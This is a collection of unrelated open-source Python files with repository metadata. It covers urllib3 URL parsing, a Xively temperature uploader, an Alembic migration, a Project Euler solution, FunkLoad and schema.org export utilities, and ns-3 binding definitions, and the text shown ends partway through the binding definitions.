# "https://username:[email protected]:80/path?query#fragment"
"""
scheme, auth, host, port, path, query, fragment = self
url = ""
# We use "is not None" we want things to happen with empty strings (or 0 port)
if scheme is not None:
url += scheme + "://"
if auth is not None:
url += auth + "@"
if host is not None:
url += host
if port is not None:
url += ":" + str(port)
if path is not None:
url += path
if query is not None:
url += "?" + query
if fragment is not None:
url += "#" + fragment
return url
def __str__(self) -> str:
return self.url
@overload
def _encode_invalid_chars(
component: str, allowed_chars: Container[str]
) -> str: # Abstract
...
@overload
def _encode_invalid_chars(
component: None, allowed_chars: Container[str]
) -> None: # Abstract
...
def _encode_invalid_chars(
component: Optional[str], allowed_chars: Container[str]
) -> Optional[str]:
"""Percent-encodes a URI component without reapplying
onto an already percent-encoded component.
"""
if component is None:
return component
component = to_str(component)
# Normalize existing percent-encoded bytes.
# Try to see if the component we're encoding is already percent-encoded
# so we can skip all '%' characters but still encode all others.
component, percent_encodings = _PERCENT_RE.subn(
lambda match: match.group(0).upper(), component
)
uri_bytes = component.encode("utf-8", "surrogatepass")
is_percent_encoded = percent_encodings == uri_bytes.count(b"%")
encoded_component = bytearray()
for i in range(0, len(uri_bytes)):
# Will return a single character bytestring
byte = uri_bytes[i : i + 1]
byte_ord = ord(byte)
if (is_percent_encoded and byte == b"%") or (
byte_ord < 128 and byte.decode() in allowed_chars
):
encoded_component += byte
continue
encoded_component.extend(b"%" + (hex(byte_ord)[2:].encode().zfill(2).upper()))
return encoded_component.decode()
def _remove_path_dot_segments(path: str) -> str:
# See http://tools.ietf.org/html/rfc3986#section-5.2.4 for pseudo-code
segments = path.split("/") # Turn the path into a list of segments
output = [] # Initialize the variable to use to store output
for segment in segments:
# '.' is the current directory, so ignore it, it is superfluous
if segment == ".":
continue
# Anything other than '..', should be appended to the output
if segment != "..":
output.append(segment)
# In this case segment == '..', if we can, we should pop the last
# element
elif output:
output.pop()
# If the path starts with '/' and the output is empty or the first string
# is non-empty
if path.startswith("/") and (not output or output[0]):
output.insert(0, "")
# If the path starts with '/.' or '/..' ensure we add one more empty
# string to add a trailing '/'
if path.endswith(("/.", "/..")):
output.append("")
return "/".join(output)
def _normalize_host(host: Optional[str], scheme: Optional[str]) -> Optional[str]:
if host:
if scheme in _NORMALIZABLE_SCHEMES:
is_ipv6 = _IPV6_ADDRZ_RE.match(host)
if is_ipv6:
match = _ZONE_ID_RE.search(host)
if match:
start, end = match.span(1)
zone_id = host[start:end]
if zone_id.startswith("%25") and zone_id != "%25":
zone_id = zone_id[3:]
else:
zone_id = zone_id[1:]
zone_id = _encode_invalid_chars(zone_id, _UNRESERVED_CHARS)
return f"{host[:start].lower()}%{zone_id}{host[end:]}"
else:
return host.lower()
elif not _IPV4_RE.match(host):
return to_str(
b".".join([_idna_encode(label) for label in host.split(".")]),
"ascii",
)
return host
def _idna_encode(name: str) -> bytes:
if name and any([ord(x) > 128 for x in name]):
try:
import idna
except ImportError:
raise LocationParseError(
"Unable to parse URL without the 'idna' module"
) from None
try:
return idna.encode(name.lower(), strict=True, std3_rules=True)
except idna.IDNAError:
raise LocationParseError(
f"Name '{name}' is not a valid IDNA label"
) from None
return name.lower().encode("ascii")
def _encode_target(target: str) -> str:
"""Percent-encodes a request target so that there are no invalid characters
Pre-condition for this function is that 'target' must start with '/'.
If that is the case then _TARGET_RE will always produce a match.
"""
match = _TARGET_RE.match(target)
if not match: # Defensive:
raise LocationParseError(f"{target!r} is not a valid request URI")
path, query = match.groups()
encoded_target = _encode_invalid_chars(path, _PATH_CHARS)
if query is not None:
query = _encode_invalid_chars(query, _QUERY_CHARS)
encoded_target += "?" + query
return encoded_target
def parse_url(url: str) -> Url:
"""
Given a url, return a parsed :class:`.Url` namedtuple. Best-effort is
performed to parse incomplete urls. Fields not provided will be None.
This parser is RFC 3986 compliant.
The parser logic and helper functions are based heavily on
work done in the ``rfc3986`` module.
:param str url: URL to parse into a :class:`.Url` namedtuple.
Partly backwards-compatible with :mod:`urlparse`.
Example:
.. code-block:: python
import urllib3
print( urllib3.util.parse_url('http://google.com/mail/'))
# Url(scheme='http', host='google.com', port=None, path='/mail/', ...)
print( urllib3.util.parse_url('google.com:80'))
# Url(scheme=None, host='google.com', port=80, path=None, ...)
print( urllib3.util.parse_url('/foo?bar'))
# Url(scheme=None, host=None, port=None, path='/foo', query='bar', ...)
"""
if not url:
# Empty
return Url()
source_url = url
if not _SCHEME_RE.search(url):
url = "//" + url
scheme: Optional[str]
authority: Optional[str]
auth: Optional[str]
host: Optional[str]
port: Optional[str]
port_int: Optional[int]
path: Optional[str]
query: Optional[str]
fragment: Optional[str]
try:
scheme, authority, path, query, fragment = _URI_RE.match(url).groups() # type: ignore[union-attr]
normalize_uri = scheme is None or scheme.lower() in _NORMALIZABLE_SCHEMES
if scheme:
scheme = scheme.lower()
if authority:
auth, _, host_port = authority.rpartition("@")
auth = auth or None
host, port = _HOST_PORT_RE.match(host_port).groups() # type: ignore[union-attr]
if auth and normalize_uri:
auth = _encode_invalid_chars(auth, _USERINFO_CHARS)
if port == "":
port = None
else:
auth, host, port = None, None, None
if port is not None:
port_int = int(port)
if not (0 <= port_int <= 65535):
raise LocationParseError(url)
else:
port_int = None
host = _normalize_host(host, scheme)
if normalize_uri and path:
path = _remove_path_dot_segments(path)
path = _encode_invalid_chars(path, _PATH_CHARS)
if normalize_uri and query:
query = _encode_invalid_chars(query, _QUERY_CHARS)
if normalize_uri and fragment:
fragment = _encode_invalid_chars(fragment, _FRAGMENT_CHARS)
except (ValueError, AttributeError) as e:
raise LocationParseError(source_url) from e
# For the sake of backwards compatibility we put empty
# string values for path if there are any defined values
# beyond the path in the URL.
# TODO: Remove this when we break backwards compatibility.
if not path:
if query is not None or fragment is not None:
path = ""
else:
path = None
return Url(
scheme=scheme,
auth=auth,
host=host,
port=port_int,
path=path,
query=query,
fragment=fragment,
)
|
urllib3/urllib3
|
src/urllib3/util/url.py
|
Python
|
mit
| 14,809 | 0.000743 |
#!/usr/bin/env python
import argparse
import datetime
import os
import re
import requests
import subprocess
import sys
import time
import xively
DEBUG = os.environ["DEBUG"] or false
def read_temperature(from_file):
if DEBUG:
print "Reading temperature from file: %s" % from_file
temperature = None
with open(from_file, 'r') as f:
crc = f.readline()
reading = f.readline()
matches = re.search('t=(\d+)', reading)
if matches:
temperature = float(matches.group(1)) / 1000.0
return temperature
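# Return the named datastream of the feed, creating it if it does not exist yet.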
def get_datastream(feed, name):
try:
datastream = feed.datastreams.get(name)
if DEBUG:
print "Found existing datastream"
return datastream
except:
if DEBUG:
print "Creating new datastream"
datastream = feed.datastreams.create(name, tags="units=celsius")
return datastream
def run():
parser = argparse.ArgumentParser(description = 'Push a metric to Xively')
parser.add_argument('--feed', type=str, required=True, help='your Xively feed ID')
parser.add_argument('--key', type=str, required=True, help='your Xively API key')
parser.add_argument('--name', type=str, default='temperature0', help='your Xively datastream name')
parser.add_argument('--file', type=str, required=True, help='the file from which to read the temperature')
args = parser.parse_args()
api = xively.XivelyAPIClient(args.key)
feed = api.feeds.get(args.feed)
datastream = get_datastream(feed, args.name)
datastream.max_value = None
datastream.min_value = None
while True:
temperature = read_temperature(args.file)
if DEBUG:
print "Updating Xively feed with value: %s" % temperature
datastream.current_value = temperature
datastream.at = datetime.datetime.utcnow()
try:
datastream.update()
except Exception as err:
sys.stderr.write('ERROR: %s\n' % str(err))
print "Updated Xively feed, sleeping..."
time.sleep(60)
run()
|
dwc/pi-monitoring
|
bin/push_temperature.py
|
Python
|
mit
| 1,946 | 0.018499 |
# Copyright 2015 CloudFounders NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This package contains Linux OS distribution extensions
"""
|
tcpcloud/openvstorage
|
ovs/extensions/os/__init__.py
|
Python
|
apache-2.0
| 644 | 0 |
"""db migration
Revision ID: 373a21295ab
Revises: 21f5b2d3905d
Create Date: 2015-05-05 15:42:33.474470
"""
# revision identifiers, used by Alembic.
revision = '373a21295ab'
down_revision = '21f5b2d3905d'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.drop_table('items')
items = op.create_table('items',
sa.Column('id', sa.Integer, primary_key=True),
sa.Column('name', sa.String(255), nullable=False),
sa.Column('is_bought', sa.Boolean, default=False, nullable=False),
sa.Column('created', sa.DateTime, default=sa.func.now(),
nullable=False),
sa.Column('modified', sa.DateTime, default=sa.func.now(),
onupdate=sa.func.now(), nullable=False))
def downgrade():
op.drop_table('items')
op.create_table('items',
sa.Column('id', sa.Integer, primary_key=True),
sa.Column('name', sa.String(255), nullable=False),
sa.Column('is_bought', sa.Boolean, default=False, nullable=False),
sa.Column('modified', sa.DateTime, default=sa.func.now(),
onupdate=sa.func.now(), nullable=False),
sa.Column('created', sa.DateTime, default=sa.func.now()))
|
Mytho/groceries-api
|
db/versions/20150505_154233_373a21295ab_db_migration.py
|
Python
|
mit
| 1,244 | 0.003215 |
from ..library.base import number_to_list
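# Project Euler 56: find the maximum digital sum among all numbers of the form a**b with a, b < bound.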
def solve(bound: int=100):
maximal = 0
for a in range(bound):
for b in range(bound):
sum_digits = sum(number_to_list(a ** b))
if sum_digits > maximal:
maximal = sum_digits
return maximal
|
cryvate/project-euler
|
project_euler/solutions/problem_56.py
|
Python
|
mit
| 294 | 0.006803 |
# (C) Copyright 2011 Nuxeo SAS <http://nuxeo.com>
# Author: [email protected]
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
# 02111-1307, USA.
#
"""Classes that render statistics in emacs org-mode format.
"""
import re
from ReportRenderRst import RenderRst
from ReportRenderRst import BaseRst
import ReportRenderRst
from MonitorPlugins import MonitorPlugins
FL_SITE = "http://funkload.nuxeo.org"
def org_title(title, level=1, newpage=True):
"""Return an org section."""
org = []
if newpage:
org.append("")
org.append("")
org.append("#+BEGIN_LaTeX")
org.append("\\newpage")
org.append('#+END_LaTeX')
org.append('*' * (level - 1) + ' ' + title + '\n')
return '\n'.join(org)
def org_image(self):
org = ["#+BEGIN_LaTeX"]
org.append('\\begin{center}')
for image_name in self.image_names:
org.append("\includegraphics[scale=0.5]{{./%s}.png}" % image_name)
org.append('\\end{center}')
org.append('#+END_LaTeX')
return '\n'.join(org) + '\n'
def org_header(self, with_chart=False):
headers = self.headers[:]
if self.with_percentiles:
self._attach_percentiles_header(headers)
org = [self.render_image()]
org.append("#+BEGIN_LaTeX")
org.append("\\tiny")
org.append('#+END_LaTeX')
org.append(' |' + '|'.join(headers) + '|\n |-')
return '\n'.join(org)
def org_footer(self):
org = [' |-']
org.append("#+BEGIN_LaTeX")
org.append("\\normalsize")
org.append('#+END_LaTeX')
return '\n'.join(org)
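# Monkey-patch the ReST renderer so titles, list items, table headers/footers and
# images are emitted in org-mode/LaTeX syntax instead of reStructuredText.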
ReportRenderRst.rst_title = org_title
ReportRenderRst.LI = '-'
BaseRst.render_header = org_header
BaseRst.render_footer = org_footer
BaseRst.render_image = org_image
BaseRst.sep = '|'
class RenderOrg(RenderRst):
"""Render stats in ReST format."""
# number of slowest requests to display
slowest_items = 5
with_chart = True
def __init__(self, config, stats, error, monitor, monitorconfig, options):
options.html = True
RenderRst.__init__(self, config, stats, error, monitor, monitorconfig, options)
def renderHeader(self):
config = self.config
self.append('# -*- mode: org -*-')
self.append('#+TITLE: FunkLoad bench report')
self.append('#+DATE: ' + self.date)
self.append('''#+STYLE: <link rel="stylesheet" type="text/css" href="eon.css" />
#+LaTeX_CLASS: koma-article
#+LaTeX_CLASS_OPTIONS: [a4paper,landscape]
#+LATEX_HEADER: \usepackage[utf8]{inputenc}
#+LATEX_HEADER: \usepackage[en]{babel}
#+LATEX_HEADER: \usepackage{fullpage}
#+LATEX_HEADER: \usepackage[hyperref,x11names]{xcolor}
#+LATEX_HEADER: \usepackage[colorlinks=true,urlcolor=SteelBlue4,linkcolor=Firebrick4]{hyperref}
#+LATEX_HEADER: \usepackage{graphicx}
#+LATEX_HEADER: \usepackage[T1]{fontenc}''')
description = [config['class_description']]
description += ["Bench result of ``%s.%s``: " % (config['class'],
config['method'])]
description += [config['description']]
self.append('#+TEXT: Bench result of =%s.%s=: %s' % (
config['class'], config['method'], ' '.join(description)))
self.append('#+OPTIONS: toc:1')
self.append('')
def renderMonitor(self, host, charts):
"""Render a monitored host."""
description = self.config.get(host, '')
self.append(org_title("%s: %s" % (host, description), 3))
for chart in charts:
self.append('#+BEGIN_LaTeX')
self.append('\\begin{center}')
self.append("\includegraphics[scale=0.5]{{./%s}.png}" % chart[1])
self.append('\\end{center}')
self.append('#+END_LaTeX')
def renderHook(self):
self.rst = [line.replace('``', '=') for line in self.rst]
lapdex = "Apdex_{%s}" % str(self.options.apdex_t)
kv = re.compile("^(\ *\- [^\:]*)\:(.*)")
bold = re.compile("\*\*([^\*]+)\*\*")
link = re.compile("\`([^\<]+)\<([^\>]+)\>\`\_")
ret = []
for line in self.rst:
line = re.sub(kv, lambda m: "%s :: %s\n\n" % (
m.group(1), m.group(2)), line)
line = re.sub(bold, lambda m: "*%s*" % (m.group(1)),
line)
line = re.sub(link, lambda m: "[[%s][%s]]" % (m.group(2),
m.group(1).strip()),
line)
line = line.replace('|APDEXT|', lapdex)
line = line.replace('Apdex*', lapdex)
line = line.replace('Apdex T', 'Apdex_{T}')
line = line.replace('FunkLoad_',
'[[%s][FunkLoad]]' % FL_SITE)
ret.append(line)
self.rst = ret
def createMonitorCharts(self):
"""Create all montirored server charts."""
if not self.monitor or not self.with_chart:
return
self.append(org_title("Monitored hosts", 2))
charts = {}
for host in self.monitor.keys():
charts[host] = self.createMonitorChart(host)
return charts
def createMonitorChart(self, host):
"""Create monitrored server charts."""
charts = []
Plugins = MonitorPlugins()
Plugins.registerPlugins()
Plugins.configure(self.getMonitorConfig(host))
for plugin in Plugins.MONITORS.values():
image_path = ('%s_%s' % (host, plugin.name)).replace("\\", "/")
charts.append((plugin.name, image_path))
return charts
| mozilla-services/FunkLoad | src/funkload/ReportRenderOrg.py | Python | gpl-2.0 | 6,127 | 0.003754 |
# -*- encoding: utf-8 -*-
# Module iainfgen
from numpy import *
def iainfgen(f, Iab):
    """Inf-generating operator from the interval Iab = [A, Bc].

    Returns the union of the dilation of f by A with the dilation of the
    complement (negation) of f by Bc.
    """
    from iaunion import iaunion
    from iadil import iadil
    from ianeg import ianeg
    A, Bc = Iab
    y = iaunion(iadil(f, A), iadil(ianeg(f), Bc))
    return y
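# Illustrative check (added; not part of the original ia870 toolbox): the same
# inf-generating formula written with scipy for flat binary structuring
# elements.  The sample arrays below are made up purely for demonstration.
if __name__ == "__main__":
    from scipy.ndimage import binary_dilation
    f = array([[0, 1, 0],
               [1, 1, 1],
               [0, 1, 0]], dtype=bool)
    A = array([[0, 1, 0],
               [0, 1, 0],
               [0, 1, 0]], dtype=bool)    # interval end A
    Bc = array([[1, 0, 1],
                [0, 0, 0],
                [1, 0, 1]], dtype=bool)   # interval end Bc (used on the complement)
    y = binary_dilation(f, A) | binary_dilation(~f, Bc)
    print(y)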
| mariecpereira/IA369Z | deliver/ia870/iainfgen.py | Python | mit | 261 | 0.019157 |
import csv
import rdflib
from rdflib.namespace import RDFS, RDF, OWL
from rdflib.term import URIRef
import threading
from apimarkdown import Markdown
from apirdflib import RDFLIBLOCK
import logging
logging.basicConfig(level=logging.INFO) # dev_appserver.py --log_level debug .
log = logging.getLogger(__name__)
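# Exports the schema.org vocabulary held in rdflib graphs to CSV: one table
# for types and one for properties; terms filed under http://attic.schema.org
# can be excluded via excludeAttic.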
class sdordf2csv():
def __init__(self, queryGraph=None, fullGraph=None, markdownComments=True,excludeAttic=False):
self.setqueryGraph(queryGraph)
self.setfullGraph(fullGraph)
self.setexcludeAttic(excludeAttic)
self.setmarkdownComments(markdownComments)
def setqueryGraph(self,graph=None):
self.queryGraph = graph
def setfullGraph(self,graph=None):
self.fullGraph = graph
def setexcludeAttic(self,state):
self.excludeAttic = state
def setmarkdownComments(self,state):
self.markdown = state
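    # doQuery wraps graph.query so access to the shared rdflib graph is
    # serialized behind RDFLIBLOCK.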
def doQuery(self,graph=None,query=None):
res = None
try:
RDFLIBLOCK.acquire()
res = list(graph.query(query))
finally:
RDFLIBLOCK.release()
return res
def outputCSVtypes(self,file):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?term schema:isPartOf <http://attic.schema.org>}."
query= ('''select ?term where {
?term a ?type.
BIND(STR(?term) AS ?strVal)
FILTER NOT EXISTS {?term a rdf:Property}.
FILTER(STRLEN(?strVal) >= 18 && SUBSTR(?strVal, 1, 18) = "http://schema.org/").
%s
}
ORDER BY ?term
''') % atticfilter
try:
RDFLIBLOCK.acquire()
types = list(self.queryGraph.query(query))
finally:
RDFLIBLOCK.release()
#log.info( "Types: %s" % len(types))
self.type2CSV(header=True,out=file)
for t in types:
self.type2CSV(term=t.term,header=False,out=file,graph=self.queryGraph)
def outputCSVproperties(self,file):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?term schema:isPartOf <http://attic.schema.org>}."
query= ('''select ?term where {
?term a rdf:Property.
FILTER EXISTS {?term rdfs:label ?l}.
BIND(STR(?term) AS ?strVal).
FILTER(STRLEN(?strVal) >= 18 && SUBSTR(?strVal, 1, 18) = "http://schema.org/").
%s
}
ORDER BY ?term''') % atticfilter
props = list(self.queryGraph.query(query))
self.prop2CSV(header=True,out=file)
for t in props:
self.prop2CSV(term=t.term,header=False,out=file,graph=self.queryGraph)
def prop2CSV(self,term=None,header=True,out=None,graph=None):
cols = ["id","label","comment","subPropertyOf","equivalentProperty","subproperties","domainIncludes","rangeIncludes","inverseOf","supersedes","supersededBy","isPartOf"]
if not out:
return
writer = csv.writer(out,quoting=csv.QUOTE_ALL,lineterminator='\n')
if header:
writer.writerow(cols)
return
if not graph:
graph = self.queryGraph
if term == None or graph == None:
return
row = [str(term)]
row.append(self.graphValueToCSV(subject=term,predicate=RDFS.label,graph=graph))
row.append(self.getCSVComment(term,graph=self.fullGraph))
row.append(self.getCSVSuperProperties(term,graph=self.fullGraph))
row.append(self.graphValueToCSV(subject=term,predicate=OWL.equivalentProperty,graph=graph))
row.append(self.getCSVSubProperties(term,graph=self.fullGraph))
row.append(self.getCSVDomainIncludes(term,graph=self.fullGraph))
row.append(self.getCSVRangeIncludes(term,graph=self.fullGraph))
row.append(self.graphValueToCSV(subject=term,predicate=URIRef("http://schema.org/inverseOf"),graph=graph))
row.append(self.getCSVsuperseds(term,graph=self.fullGraph))
row.append(self.getCSVSupersededBy(term,graph=self.fullGraph))
row=[s.encode('utf-8') for s in row]
writer.writerow(row)
#print term
def type2CSV(self,term=None,header=True,out=None,graph=None):
cols = ["id","label","comment","subTypeOf","enumerationtype","equivalentClass","properties","subTypes","supersedes","supersededBy","isPartOf"]
if not out:
return
writer = csv.writer(out,quoting=csv.QUOTE_ALL,lineterminator='\n')
if header:
writer.writerow(cols)
return
if not graph:
graph = self.queryGraph
if term == None or graph == None:
return
if not isinstance(term, URIRef):
term = URIRef(term)
enumType = self.graphValueToCSV(subject=term,predicate=RDF.type,graph=graph)
if enumType.endswith("#Class"):
enumType = ""
row = [str(term)]
row.append(self.graphValueToCSV(subject=term,predicate=RDFS.label,graph=graph))
row.append(self.getCSVComment(term,graph=self.fullGraph))
row.append(self.getCSVSupertypes(term,graph=self.fullGraph))
row.append(enumType)
row.append(self.graphValueToCSV(subject=term,predicate=OWL.equivalentClass,graph=graph))
row.append(self.getCSVTypeProperties(term,graph=self.fullGraph))
row.append(self.getCSVSubtypes(term,graph=self.fullGraph))
row.append(self.getCSVsuperseds(term,graph=self.fullGraph))
row.append(self.getCSVSupersededBy(term,graph=self.fullGraph))
row.append(self.graphValueToCSV(subject=term,predicate=URIRef("http://schema.org/isPartOf"),graph=graph))
row=[s.encode('utf-8') for s in row]
writer.writerow(row)
def graphValueToCSV(self, subject=None, predicate= None, object= None, graph=None):
ret = ""
try:
RDFLIBLOCK.acquire()
ret = str(graph.value(subject=subject,predicate=predicate,object=object))
finally:
RDFLIBLOCK.release()
if ret == None or ret == "None":
ret = ""
return ret
def getCSVSupertypes(self,term=None,graph=None):
query='''select ?sup where{
<%s> rdfs:subClassOf ?sup.
BIND(STR(?sup) AS ?strVal)
FILTER(STRLEN(?strVal) >= 18 && SUBSTR(?strVal, 1, 18) = "http://schema.org/")
}
ORDER BY ?sup''' % term
res = self.doQuery(graph,query)
ret = ', '.join([x.sup for x in res])
return ret
def getCSVTypeProperties(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?prop schema:isPartOf <http://attic.schema.org>.}"
query='''select DISTINCT ?prop where{
?term (^rdfs:subClassOf*) <%s>.
?prop <http://schema.org/domainIncludes> ?term.
%s
}
ORDER BY ?prop''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.prop for x in res])
return ret
def getCSVSubtypes(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?sub schema:isPartOf <http://attic.schema.org>.}"
query='''select ?sub where{
?sub rdfs:subClassOf <%s>.
%s
}
ORDER BY ?sub''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.sub for x in res])
#print "SUBTYPES of %s: '%s'" % (term,ret)
return ret
def getCSVSupersededBy(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?sub schema:isPartOf <http://attic.schema.org>.}"
query='''select ?sup where{
<%s> schema:supersededBy ?sup.
%s
}
ORDER BY ?sup''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.sup for x in res])
#print "%s supercededBy: '%s'" % (term,ret)
return ret
def getCSVsuperseds(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?sup schema:isPartOf <http://attic.schema.org>.}"
query='''select ?sup where{
?sup schema:supersededBy <%s>.
%s
}
ORDER BY ?sup''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.sup for x in res])
#print "%s superseds: '%s'" % (term,ret)
return ret
def getCSVSuperProperties(self,term=None,graph=None):
query='''select ?sup where{
<%s> rdfs:subPropertyOf ?sup.
BIND(STR(?sup) AS ?strVal)
FILTER(STRLEN(?strVal) >= 18 && SUBSTR(?strVal, 1, 18) = "http://schema.org/")
}
ORDER BY ?sup''' % term
res = self.doQuery(graph,query)
ret = ', '.join([x.sup for x in res])
#print "%s subtypeof: '%s'" % (term,ret)
return ret
def getCSVSubProperties(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?sub schema:isPartOf <http://attic.schema.org>.}"
query='''select ?sub where{
?sub rdfs:subPropertyOf <%s>.
%s
}
ORDER BY ?sub''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.sub for x in res])
#print "SUBTYPES of %s: '%s'" % (term,ret)
return ret
def getCSVDomainIncludes(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?type schema:isPartOf <http://attic.schema.org>.}"
query='''select ?type where{
<%s> <http://schema.org/domainIncludes> ?type.
%s
}
ORDER BY ?type''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.type for x in res])
#print "SUBTYPES of %s: '%s'" % (term,ret)
return ret
def getCSVRangeIncludes(self,term=None,graph=None):
atticfilter = ""
if self.excludeAttic:
atticfilter = "FILTER NOT EXISTS {?type schema:isPartOf <http://attic.schema.org>.}"
query='''select ?type where{
<%s> <http://schema.org/rangeIncludes> ?type.
%s
}
ORDER BY ?type''' % (term,atticfilter)
res = self.doQuery(graph,query)
ret = ', '.join([x.type for x in res])
#print "SUBTYPES of %s: '%s'" % (term,ret)
return ret
def getCSVComment(self,term=None,graph=None):
query='''select ?com where{
<%s> rdfs:comment ?com.
}''' % term
res = self.doQuery(graph,query)
ret = ', '.join([x.com for x in res])
#print "SUBTYPES of %s: '%s'" % (term,ret)
if self.markdown:
Markdown.setPre("http://schema.org/")
ret = Markdown.parse(ret)
Markdown.setPre()
return ret
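# Minimal usage sketch (added for illustration; not part of the original
# file).  The empty in-memory graph stands in for a Graph already loaded with
# the schema.org vocabulary, and the output filenames are made up.
if __name__ == "__main__":
    example_graph = rdflib.Graph()
    example_graph.bind("schema", "http://schema.org/")
    exporter = sdordf2csv(queryGraph=example_graph, fullGraph=example_graph,
                          markdownComments=False, excludeAttic=True)
    with open("schema-types.csv", "w") as out:
        exporter.outputCSVtypes(out)
    with open("schema-properties.csv", "w") as out:
        exporter.outputCSVproperties(out)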
| unor/schemaorg | sdordf2csv.py | Python | apache-2.0 | 11,152 | 0.017755 |
from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
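# Downgrade wrapper-generation failures to warnings so a single problematic
# binding does not abort generation of the whole module.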
class ErrorHandler(pybindgen.settings.ErrorHandler):
def handle_error(self, wrapper, exception, traceback_):
warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
return True
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
root_module = Module('ns.network', cpp_namespace='::ns3')
return root_module
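# Illustrative driver sketch (added; not part of the generated bindings): how
# a pybindgen module built by module_init() and the register_* functions below
# is typically emitted as C++ source.
#   root = module_init()
#   register_types(root)
#   register_methods(root)
#   root.generate(FileCodeSink(sys.stdout))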
def register_types(module):
root_module = module.get_root()
## packetbb.h (module 'network'): ns3::PbbAddressLength [enumeration]
module.add_enum('PbbAddressLength', ['IPV4', 'IPV6'])
## ethernet-header.h (module 'network'): ns3::ethernet_header_t [enumeration]
module.add_enum('ethernet_header_t', ['LENGTH', 'VLAN', 'QINQ'])
## address.h (module 'network'): ns3::Address [class]
module.add_class('Address')
## address.h (module 'network'): ns3::Address::MaxSize_e [enumeration]
module.add_enum('MaxSize_e', ['MAX_SIZE'], outer_class=root_module['ns3::Address'])
## application-container.h (module 'network'): ns3::ApplicationContainer [class]
module.add_class('ApplicationContainer')
## trace-helper.h (module 'network'): ns3::AsciiTraceHelper [class]
module.add_class('AsciiTraceHelper')
## trace-helper.h (module 'network'): ns3::AsciiTraceHelperForDevice [class]
module.add_class('AsciiTraceHelperForDevice', allow_subclassing=True)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList [class]
module.add_class('AttributeConstructionList', import_from_module='ns.core')
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item [struct]
module.add_class('Item', import_from_module='ns.core', outer_class=root_module['ns3::AttributeConstructionList'])
## buffer.h (module 'network'): ns3::Buffer [class]
module.add_class('Buffer')
## buffer.h (module 'network'): ns3::Buffer::Iterator [class]
module.add_class('Iterator', outer_class=root_module['ns3::Buffer'])
## packet.h (module 'network'): ns3::ByteTagIterator [class]
module.add_class('ByteTagIterator')
## packet.h (module 'network'): ns3::ByteTagIterator::Item [class]
module.add_class('Item', outer_class=root_module['ns3::ByteTagIterator'])
## byte-tag-list.h (module 'network'): ns3::ByteTagList [class]
module.add_class('ByteTagList')
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator [class]
module.add_class('Iterator', outer_class=root_module['ns3::ByteTagList'])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item [struct]
module.add_class('Item', outer_class=root_module['ns3::ByteTagList::Iterator'])
## callback.h (module 'core'): ns3::CallbackBase [class]
module.add_class('CallbackBase', import_from_module='ns.core')
## channel-list.h (module 'network'): ns3::ChannelList [class]
module.add_class('ChannelList')
## data-rate.h (module 'network'): ns3::DataRate [class]
module.add_class('DataRate')
## event-id.h (module 'core'): ns3::EventId [class]
module.add_class('EventId', import_from_module='ns.core')
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress [class]
module.add_class('Inet6SocketAddress')
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress [class]
root_module['ns3::Inet6SocketAddress'].implicitly_converts_to(root_module['ns3::Address'])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress [class]
module.add_class('InetSocketAddress')
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress [class]
root_module['ns3::InetSocketAddress'].implicitly_converts_to(root_module['ns3::Address'])
## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
module.add_class('Ipv4Address')
## ipv4-address.h (module 'network'): ns3::Ipv4Address [class]
root_module['ns3::Ipv4Address'].implicitly_converts_to(root_module['ns3::Address'])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask [class]
module.add_class('Ipv4Mask')
## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
module.add_class('Ipv6Address')
## ipv6-address.h (module 'network'): ns3::Ipv6Address [class]
root_module['ns3::Ipv6Address'].implicitly_converts_to(root_module['ns3::Address'])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix [class]
module.add_class('Ipv6Prefix')
## mac48-address.h (module 'network'): ns3::Mac48Address [class]
module.add_class('Mac48Address')
## mac48-address.h (module 'network'): ns3::Mac48Address [class]
